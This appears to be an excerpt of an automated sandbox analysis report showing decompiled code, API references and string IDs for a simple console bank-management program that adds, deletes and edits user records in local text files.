                                              0x00d82df5
                                              0x00d82dfd
                                              0x00d82e06
                                              0x00d82e0b
                                              0x00000000
                                              0x00d82e15
                                              0x00d82c3e
                                              0x00d82c42
                                              0x00d82c45
                                              0x00d82e1b
                                              0x00d82e1b
                                              0x00000000
                                              0x00d82c45
                                              0x00d82c08
                                              0x00d82c0d
                                              0x00000000

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D82B34
                                              • _wscanf.LIBCMT ref: 00D82B46
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                              • _wprintf.LIBCMT ref: 00D82B5C
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                                • Part of subcall function 00D81290: _wprintf.LIBCMT ref: 00D812C9
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _swscanf.LIBCMT ref: 00D82BA2
                                                • Part of subcall function 00D86FC1: _vfscanf.LIBCMT ref: 00D86FD5
                                              • _wprintf.LIBCMT ref: 00D82C12
                                              • _wprintf.LIBCMT ref: 00D82C2D
                                              • _wprintf.LIBCMT ref: 00D82C65
                                              • _wscanf.LIBCMT ref: 00D82C79
                                              • _wprintf.LIBCMT ref: 00D82C8F
                                              • _wprintf.LIBCMT ref: 00D82CAE
                                              • _wprintf.LIBCMT ref: 00D82CE6
                                              • _swscanf.LIBCMT ref: 00D82D4D
                                              • _fprintf.LIBCMT ref: 00D82DAD
                                              • _fprintf.LIBCMT ref: 00D82DD3
                                              • _wprintf.LIBCMT ref: 00D82E10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
                                              • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
                                              • API String ID: 1431756120-371646773
                                              • Opcode ID: 51ac6857479f5823c20e16eb3f493b862bfeac48b9d212903550c598ff0bae97
                                              • Instruction ID: fbb3a0da68ec9d3429d80fb6f6c1db7c152780cd48688aea98b41e70db56beff
                                              • Opcode Fuzzy Hash: 51ac6857479f5823c20e16eb3f493b862bfeac48b9d212903550c598ff0bae97
                                              • Instruction Fuzzy Hash: 3A814EB1E44304AEEF10FBE59C43FAE7674EF55710F044069F505E6291EAB0A6488B76
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D827A0, Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 223COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E00D827A0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				char _v20;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v52;
				char _v84;
				char _v116;
				char _v129;
				char _v139;
				char _v154;
				char _v188;
				void* __ebp;
				intOrPtr _t47;
				void* _t49;
				char _t54;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t62;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t83;
				void* _t86;
				void* _t88;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				intOrPtr _t99;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t128;
				void* _t132;
				void* _t133;
				void* _t139;

				_t146 = __fp0;
				_t117 = __esi;
				_t116 = __edi;
				_t89 = __ebx;
				_v52 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v12 = 0;
				E00D82080(__ecx, __edi, __esi, 0, __fp0);
				E00D81250(0x19, 8);
				_push("User Name  : ");
				E00D870FC(__ebx, __edi, __esi, 0);
				E00D8732B("%s", 0xda2ee4);
				E00D81250(0x19, 0xa);
				_push("Password  : ");
				E00D870FC(__ebx, __edi, __esi, 0);
				E00D81290(_t116, _t117,  &_v52);
				_t47 = E00D86E91("USER.DAT", "r");
				_t122 = _t118 + 0x18;
				 *0xda2f28 = _t47;
				while(1) {
					_push( &_v116);
					_push( &_v84);
					_t92 =  *0xda2f28; // 0x0
					_t49 = E00D86FC1(_t92, "%s %s %s\n", 0xda2ee0);
					_t123 = _t122 + 0x14;
					if(_t49 == 0xffffffff) {
						break;
					}
					_t86 = E00D881D0(0xda2ee4,  &_v84);
					_t122 = _t123 + 8;
					if(_t86 == 0) {
						_t88 = E00D881D0(0xda2f02,  &_v116);
						_t122 = _t122 + 8;
						if(_t88 == 0) {
							_v12 = _v12 + 1;
						}
					}
				}
				_t105 =  *0xda2f28; // 0x0
				_push(_t105);
				E00D86D56(_t89, _t116, _t117, __eflags);
				_t124 = _t123 + 4;
				E00D82080(_t92, _t116, _t117, __eflags, _t146);
				__eflags = _v12;
				if(__eflags != 0) {
					E00D81250(0xf, 0xa);
					_push("Are you sure you want to DELETE this user? <Y/N> : ");
					E00D870FC(_t89, _t116, _t117, __eflags);
					_t125 = _t124 + 4;
					_t54 = _v5;
					__eflags = _t54 - 0x59;
					if(_t54 == 0x59) {
						L10:
						 *0xda2f28 = E00D86E91("USER.DAT", "r");
						_t56 = E00D86E91("temp.dat", "a");
						_t127 = _t125 + 0x10;
						 *0xda2f20 = _t56;
						while(1) {
							_push( &_v116);
							_push( &_v84);
							_t93 =  *0xda2f28; // 0x0
							_t58 = E00D86FC1(_t93, "%s %s %s\n", 0xda2ee0);
							_t128 = _t127 + 0x14;
							__eflags = _t58 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							_t79 = E00D881D0(0xda2ee4,  &_v84);
							_t139 = _t128 + 8;
							__eflags = _t79;
							if(__eflags != 0) {
								L14:
								_push( &_v116);
								_push( &_v84);
								_push(0xda2ee0);
								_push("%s %s %s\n");
								_t80 =  *0xda2f20; // 0x0
								_push(_t80);
								E00D86EA6(_t89, _t116, _t117, __eflags);
								_t127 = _t139 + 0x14;
								L15:
								continue;
							}
							_t83 = E00D881D0(0xda2f02,  &_v116);
							_t127 = _t139 + 8;
							__eflags = _t83;
							if(__eflags == 0) {
								goto L15;
							}
							goto L14;
						}
						_t94 =  *0xda2f28; // 0x0
						_push(_t94);
						E00D86D56(_t89, _t116, _t117, __eflags);
						_t107 =  *0xda2f20; // 0x0
						_push(_t107);
						E00D86D56(_t89, _t116, _t117, __eflags);
						 *0xda2f28 = E00D86E91("LOG.DAT", "r");
						_t62 = E00D86E91("temp.dat", "w");
						_t132 = _t128 + 0x18;
						 *0xda2f20 = _t62;
						while(1) {
							_push( &_v129);
							_push( &_v139);
							_push( &_v154);
							_t96 =  *0xda2f28; // 0x0
							_t65 = E00D86FC1(_t96, "%s %s %s %s",  &_v188);
							_t133 = _t132 + 0x18;
							__eflags = _t65 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							E00D97C92( &_v188);
							E00D97C92( &_v20);
							_t75 = E00D881D0( &_v188,  &_v20);
							_t132 = _t133 + 0x10;
							__eflags = _t75;
							if(__eflags != 0) {
								_push( &_v129);
								_push( &_v139);
								_push( &_v154);
								_push( &_v188);
								_push("%s %s %s %s\n");
								_t99 =  *0xda2f20; // 0x0
								_push(_t99);
								E00D86EA6(_t89, _t116, _t117, __eflags);
								_t132 = _t132 + 0x18;
							}
						}
						_t109 =  *0xda2f28; // 0x0
						_push(_t109);
						E00D86D56(_t89, _t116, _t117, __eflags);
						_t67 =  *0xda2f20; // 0x0
						_push(_t67);
						E00D86D56(_t89, _t116, _t117, __eflags);
						E00D82080(_t96, _t116, _t117, __eflags, _t146);
						E00D81250(0x19, 0xa);
						_push("Record DELETED successfully!");
						return E00D870FC(_t89, _t116, _t117, __eflags);
					}
					__eflags = _v5 - 0x79;
					if(_v5 != 0x79) {
						return _t54;
					}
					goto L10;
				}
				E00D81250(0xa, 0xa);
				_push(0xd9f4fc);
				return E00D870FC(_t89, _t116, _t117, __eflags);
			}






















































                                              0x00d827a0
                                              0x00d827a0
                                              0x00d827a0
                                              0x00d827a0
                                              0x00d827a9
                                              0x00d827af
                                              0x00d827b2
                                              0x00d827b5
                                              0x00d827b8
                                              0x00d827bb
                                              0x00d827be
                                              0x00d827c1
                                              0x00d827c4
                                              0x00d827c7
                                              0x00d827ce
                                              0x00d827d7
                                              0x00d827dc
                                              0x00d827e1
                                              0x00d827f3
                                              0x00d827ff
                                              0x00d82804
                                              0x00d82809
                                              0x00d82815
                                              0x00d82824
                                              0x00d82829
                                              0x00d8282c
                                              0x00d82831
                                              0x00d82834
                                              0x00d82838
                                              0x00d82843
                                              0x00d8284a
                                              0x00d8284f
                                              0x00d82855
                                              0x00000000
                                              0x00000000
                                              0x00d82860
                                              0x00d82865
                                              0x00d8286a
                                              0x00d82875
                                              0x00d8287a
                                              0x00d8287f
                                              0x00d82887
                                              0x00d82887
                                              0x00d8287f
                                              0x00d8288a
                                              0x00d8288c
                                              0x00d82892
                                              0x00d82893
                                              0x00d82898
                                              0x00d8289b
                                              0x00d828a0
                                              0x00d828a4
                                              0x00d828c5
                                              0x00d828ca
                                              0x00d828cf
                                              0x00d828d4
                                              0x00d828d7
                                              0x00d828db
                                              0x00d828de
                                              0x00d828ed
                                              0x00d828ff
                                              0x00d8290e
                                              0x00d82913
                                              0x00d82916
                                              0x00d8291b
                                              0x00d8291e
                                              0x00d82922
                                              0x00d8292d
                                              0x00d82934
                                              0x00d82939
                                              0x00d8293c
                                              0x00d8293f
                                              0x00000000
                                              0x00000000
                                              0x00d8294a
                                              0x00d8294f
                                              0x00d82952
                                              0x00d82954
                                              0x00d8296b
                                              0x00d8296e
                                              0x00d82972
                                              0x00d82973
                                              0x00d82978
                                              0x00d8297d
                                              0x00d82982
                                              0x00d82983
                                              0x00d82988
                                              0x00d8298b
                                              0x00000000
                                              0x00d8298b
                                              0x00d8295f
                                              0x00d82964
                                              0x00d82967
                                              0x00d82969
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d82969
                                              0x00d8298d
                                              0x00d82993
                                              0x00d82994
                                              0x00d8299c
                                              0x00d829a2
                                              0x00d829a3
                                              0x00d829bd
                                              0x00d829cc
                                              0x00d829d1
                                              0x00d829d4
                                              0x00d829d9
                                              0x00d829dc
                                              0x00d829e3
                                              0x00d829ea
                                              0x00d829f7
                                              0x00d829fe
                                              0x00d82a03
                                              0x00d82a06
                                              0x00d82a09
                                              0x00000000
                                              0x00000000
                                              0x00d82a12
                                              0x00d82a1e
                                              0x00d82a31
                                              0x00d82a36
                                              0x00d82a39
                                              0x00d82a3b
                                              0x00d82a40
                                              0x00d82a47
                                              0x00d82a4e
                                              0x00d82a55
                                              0x00d82a56
                                              0x00d82a5b
                                              0x00d82a61
                                              0x00d82a62
                                              0x00d82a67
                                              0x00d82a67
                                              0x00d82a6a
                                              0x00d82a6f
                                              0x00d82a75
                                              0x00d82a76
                                              0x00d82a7e
                                              0x00d82a83
                                              0x00d82a84
                                              0x00d82a8c
                                              0x00d82a95
                                              0x00d82a9a
                                              0x00000000
                                              0x00d82aa4
                                              0x00d828e4
                                              0x00d828e7
                                              0x00d82aaa
                                              0x00d82aaa
                                              0x00000000
                                              0x00d828e7
                                              0x00d828aa
                                              0x00d828af
                                              0x00000000

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D827E1
                                              • _wscanf.LIBCMT ref: 00D827F3
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                              • _wprintf.LIBCMT ref: 00D82809
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                                • Part of subcall function 00D81290: _wprintf.LIBCMT ref: 00D812C9
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _swscanf.LIBCMT ref: 00D8284A
                                                • Part of subcall function 00D86FC1: _vfscanf.LIBCMT ref: 00D86FD5
                                              • _wprintf.LIBCMT ref: 00D828B4
                                              • _wprintf.LIBCMT ref: 00D828CF
                                              • _swscanf.LIBCMT ref: 00D82934
                                              • _fprintf.LIBCMT ref: 00D82983
                                              • _swscanf.LIBCMT ref: 00D829FE
                                              • _fprintf.LIBCMT ref: 00D82A62
                                              • _wprintf.LIBCMT ref: 00D82A9F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
                                              • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
                                              • API String ID: 3163849712-4002591224
                                              • Opcode ID: d77a4ce0df7e94517bd262ddd61b831d137c6634126c92e2eeacb83862d2c8a7
                                              • Instruction ID: ebc662dde98d650a55fce4b554007d6bfea1d102a014fdeb74a252b806e3ed64
                                              • Opcode Fuzzy Hash: d77a4ce0df7e94517bd262ddd61b831d137c6634126c92e2eeacb83862d2c8a7
                                              • Instruction Fuzzy Hash: 39719DB2E40304AEDB11FBA5DC43FBE3278AF15710F584129F905E6281FA71E6088B72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D82560, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 155COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E00D82560(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v15;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v76;
				char _v108;
				char _v140;
				void* __ebp;
				intOrPtr _t42;
				void* _t44;
				intOrPtr _t53;
				intOrPtr _t58;
				intOrPtr _t67;
				void* _t70;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t79;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t103;

				_t103 = __fp0;
				_t84 = __esi;
				_t83 = __edi;
				_t73 = __ebx;
				_v8 = 0;
				_v12 = 0;
				_v76 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v44 = 0;
				_t74 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				do {
					E00D82080(_t74, _t83, _t84, 0, _t103);
					_v8 = 0;
					E00D81250(0x19, 8);
					_push("User Name        : ");
					E00D870FC(_t73, _t83, _t84, 0);
					E00D8732B("%s", 0xda2ee4);
					_t42 = E00D86E91("USER.DAT", "r");
					_t88 = _t85 + 0x14;
					 *0xda2f28 = _t42;
					_v12 = 0;
					while(1) {
						_push( &_v140);
						_push( &_v108);
						_t75 =  *0xda2f28; // 0x0
						_t44 = E00D86FC1(_t75, "%s %s %s\n", 0xda2ee0);
						_t89 = _t88 + 0x14;
						if(_t44 == 0xffffffff) {
							goto L6;
						}
						_t70 = E00D881D0( &_v108, 0xda2ee4);
						_t88 = _t89 + 8;
						if(_t70 == 0) {
							_v12 = _v12 + 1;
						}
					}
					L6:
					_t74 =  *0xda2f28; // 0x0
					_push(_t74);
					E00D86D56(_t73, _t83, _t84, __eflags);
					_t90 = _t89 + 4;
					__eflags = _v12;
					if(__eflags == 0) {
						E00D81250(0x19, 0xa);
						_push("Password         : ");
						E00D870FC(_t73, _t83, _t84, __eflags);
						E00D81290(_t83, _t84,  &_v76);
						E00D81250(0x19, 0xc);
						_push("Confirm Password : ");
						E00D870FC(_t73, _t83, _t84, __eflags);
						_t74 =  &_v44;
						E00D81290(_t83, _t84,  &_v44);
						_t53 = E00D881D0(0xda2f02,  &_v44);
						_t85 = _t90 + 0x10;
						__eflags = _t53;
						if(__eflags != 0) {
							E00D82080( &_v44, _t83, _t84, __eflags, _t103);
							E00D81250(0xa, 0xa);
							_push(0xd9f444);
							E00D870FC(_t73, _t83, _t84, __eflags);
							_t85 = _t85 + 4;
							_t67 = _v8 + 1;
							__eflags = _t67;
							_v8 = _t67;
						}
					} else {
						E00D81250(0xa, 0xa);
						_push(0xd9f3e0);
						E00D870FC(_t73, _t83, _t84, __eflags);
						_t85 = _t90 + 4;
						_v8 = _v8 + 1;
					}
					__eflags = _v8;
				} while (__eflags != 0);
				 *0xda2f28 = E00D86E91("USER.DAT", 0xd9f474);
				_t76 =  *0xda2f28; // 0x0
				_push(_t76);
				E00D86D56(_t73, _t83, _t84, __eflags);
				 *0xda2f28 = E00D86E91("USER.DAT", "a");
				_push(0xda2f02);
				_push(0xda2ee4);
				_push(0xda2ee0);
				_push("%s %s %s\n");
				_t79 =  *0xda2f28; // 0x0
				_push(_t79);
				E00D86EA6(_t73, _t83, _t84, __eflags);
				_t58 =  *0xda2f28; // 0x0
				_push(_t58);
				E00D86D56(_t73, _t83, _t84, __eflags);
				E00D82080(_t76, _t83, _t84, __eflags, _t103);
				E00D81250(0x19, 0xa);
				_push("Record ADDED successfully!");
				return E00D870FC(_t73, _t83, _t84, __eflags);
			}











































                                              0x00d82560
                                              0x00d82560
                                              0x00d82560
                                              0x00d82560
                                              0x00d82569
                                              0x00d82570
                                              0x00d82577
                                              0x00d8257d
                                              0x00d82580
                                              0x00d82583
                                              0x00d82586
                                              0x00d82589
                                              0x00d8258c
                                              0x00d8258f
                                              0x00d82592
                                              0x00d82595
                                              0x00d82599
                                              0x00d8259b
                                              0x00d8259e
                                              0x00d825a1
                                              0x00d825a4
                                              0x00d825a7
                                              0x00d825aa
                                              0x00d825ad
                                              0x00d825b0
                                              0x00d825b3
                                              0x00d825b3
                                              0x00d825b8
                                              0x00d825c3
                                              0x00d825c8
                                              0x00d825cd
                                              0x00d825df
                                              0x00d825f1
                                              0x00d825f6
                                              0x00d825f9
                                              0x00d825fe
                                              0x00d82605
                                              0x00d8260b
                                              0x00d8260f
                                              0x00d8261a
                                              0x00d82621
                                              0x00d82626
                                              0x00d8262c
                                              0x00000000
                                              0x00000000
                                              0x00d82637
                                              0x00d8263c
                                              0x00d82641
                                              0x00d82649
                                              0x00d82649
                                              0x00d8264c
                                              0x00d8264e
                                              0x00d8264e
                                              0x00d82654
                                              0x00d82655
                                              0x00d8265a
                                              0x00d8265d
                                              0x00d82661
                                              0x00d82688
                                              0x00d8268d
                                              0x00d82692
                                              0x00d8269e
                                              0x00d826a7
                                              0x00d826ac
                                              0x00d826b1
                                              0x00d826b9
                                              0x00d826bd
                                              0x00d826cb
                                              0x00d826d0
                                              0x00d826d3
                                              0x00d826d5
                                              0x00d826d7
                                              0x00d826e0
                                              0x00d826e5
                                              0x00d826ea
                                              0x00d826ef
                                              0x00d826f5
                                              0x00d826f5
                                              0x00d826f8
                                              0x00d826f8
                                              0x00d82663
                                              0x00d82667
                                              0x00d8266c
                                              0x00d82671
                                              0x00d82676
                                              0x00d8267f
                                              0x00d8267f
                                              0x00d826fb
                                              0x00d826fb
                                              0x00d82717
                                              0x00d8271c
                                              0x00d82722
                                              0x00d82723
                                              0x00d8273d
                                              0x00d82742
                                              0x00d82747
                                              0x00d8274c
                                              0x00d82751
                                              0x00d82756
                                              0x00d8275c
                                              0x00d8275d
                                              0x00d82765
                                              0x00d8276a
                                              0x00d8276b
                                              0x00d82773
                                              0x00d8277c
                                              0x00d82781
                                              0x00d82791

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D825CD
                                              • _wscanf.LIBCMT ref: 00D825DF
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _swscanf.LIBCMT ref: 00D82621
                                                • Part of subcall function 00D86FC1: _vfscanf.LIBCMT ref: 00D86FD5
                                              • _wprintf.LIBCMT ref: 00D82671
                                              • _wprintf.LIBCMT ref: 00D82692
                                              • _wprintf.LIBCMT ref: 00D826B1
                                              • _wprintf.LIBCMT ref: 00D826EA
                                              • _fprintf.LIBCMT ref: 00D8275D
                                              • _wprintf.LIBCMT ref: 00D82786
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
                                              • String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
                                              • API String ID: 3917209068-3252730458
                                              • Opcode ID: a80a7cc3cf4f6f93fe5fbf4c2359ec180dfbf4afafdbb8ad986bcb4b82fab461
                                              • Instruction ID: 968a08746fc4706366cb337ad2b33df010d00c9396a1bed3fc0f5f8575541580
                                              • Opcode Fuzzy Hash: a80a7cc3cf4f6f93fe5fbf4c2359ec180dfbf4afafdbb8ad986bcb4b82fab461
                                              • Instruction Fuzzy Hash: 4F512CB1E40308AEDB00FBA9DC43BAE76B4EF15714F144029F904F6281EAB19658877A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D82180, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 77COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 73%
                                              			E00D82180(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* __ebp;
				void* _t28;
				intOrPtr _t31;
				void* _t34;
				void* _t35;
				void* _t36;

				_t33 = __esi;
				_t32 = __edi;
				E00D81320(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
				E00D81250(0x1b, 4);
				_push("BANK MANAGEMENT //");
				E00D870FC(_t28, __edi, __esi, __eflags);
				_t35 = _t34 + 4;
				E00D81250(0x19, 5);
				_v8 = 0;
				while(1) {
					_t42 = _v8 - 0x1b;
					if(_v8 >= 0x1b) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E00D870FC(_t28, _t32, _t33, _t42);
					_t35 = _t35 + 8;
					_v8 = _v8 + 1;
				}
				E00D81250(0x19, 8);
				_push("Designed and Programmed by:");
				E00D870FC(_t28, _t32, _t33, __eflags);
				_t36 = _t35 + 4;
				E00D81250(0x19, 9);
				_v8 = 0;
				while(1) {
					__eflags = _v8 - 0x1b;
					if(__eflags >= 0) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E00D870FC(_t28, _t32, _t33, __eflags);
					_t36 = _t36 + 8;
					_t31 = _v8 + 1;
					__eflags = _t31;
					_v8 = _t31;
				}
				E00D81250(0x21, 0xb);
				_push("Ravi Agrawal");
				E00D870FC(_t28, _t32, _t33, __eflags);
				E00D81250(0x21, 0xd);
				_push("Sagar Sharma");
				E00D870FC(_t28, _t32, _t33, __eflags);
				E00D81250(0x21, 0xf);
				_push("Sawal Maskey");
				E00D870FC(_t28, _t32, _t33, __eflags);
				E00D81250(0x18, 0x14);
				_push("Press Any key to continue...");
				return E00D870FC(_t28, _t32, _t33, __eflags);
			}










                                              0x00d82180
                                              0x00d82180
                                              0x00d8218c
                                              0x00d82195
                                              0x00d8219a
                                              0x00d8219f
                                              0x00d821a4
                                              0x00d821ab
                                              0x00d821b0
                                              0x00d821c2
                                              0x00d821c2
                                              0x00d821c6
                                              0x00000000
                                              0x00000000
                                              0x00d821c8
                                              0x00d821cd
                                              0x00d821d2
                                              0x00d821d7
                                              0x00d821bf
                                              0x00d821bf
                                              0x00d821e0
                                              0x00d821e5
                                              0x00d821ea
                                              0x00d821ef
                                              0x00d821f6
                                              0x00d821fb
                                              0x00d8220d
                                              0x00d8220d
                                              0x00d82211
                                              0x00000000
                                              0x00000000
                                              0x00d82213
                                              0x00d82218
                                              0x00d8221d
                                              0x00d82222
                                              0x00d82207
                                              0x00d82207
                                              0x00d8220a
                                              0x00d8220a
                                              0x00d8222b
                                              0x00d82230
                                              0x00d82235
                                              0x00d82241
                                              0x00d82246
                                              0x00d8224b
                                              0x00d82257
                                              0x00d8225c
                                              0x00d82261
                                              0x00d8226d
                                              0x00d82272
                                              0x00d82282

                                              APIs
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8133D
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8139C
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81410
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81433
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D8219F
